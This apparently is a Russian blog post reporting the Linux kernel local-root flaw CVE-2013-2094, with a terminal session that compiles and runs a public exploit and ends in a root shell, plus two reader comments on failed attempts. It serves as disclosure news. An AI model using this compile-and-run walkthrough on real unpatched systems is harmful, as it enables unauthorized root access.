0day уязвимость в ядре Linux

4

encryptionВ ядре Linux найдена ранее неизвестная 0-day уязвимость CVE-2013-2094, которая позволяет получить root-доступ любому пользователю. Ошибка существует во всех ядрах, начиная с 2.6.37 до 3.8.8. В 3.8.9 версии этой уязвимости уже нет. Патч с устранением проблемы принят в состав ядра 3.8.9 в апреле. В дистрибутивах уязвимость пока остаётся неисправленной.

Эксплоит выложен в открытый доступ. Он должен срабатывать на ядрах 2.6.37 — 3.8.8, скомпилированных с опцией PERF_EVENTS (опция по умолчанию в большинстве современных дистрибутивов).

Эксплоит можно скомпилировать следующим образом:

vm$ gcc -O2 exploit.c
vm$ chmod 777 a.out
vm$ su nobody -s /bin/bash
vm$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

vm$ cd /
vm$ ls
a.out bin boot dev etc exploit.c home lib lib64 media

vm$ ./a.out
2.6.37-3.x x86_64

sh$ id
uid=0(root) gid=0(root) groups=0(root),99(nobody)

Подробное описание можно прочитать здесь

4 комментария для “0day уязвимость в ядре Linux

  1. Попробовал на Ubuntu 13.04 с ядром 3.8.0. Не работает. Может она характерна только для x86_64? У меня 32-разрядный процессор.

  2. Попробовал на Rosa Linux 64-разрядной с последними обновлениями — не работает. Молодцы Rosalab — «залатали» почти сразу.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *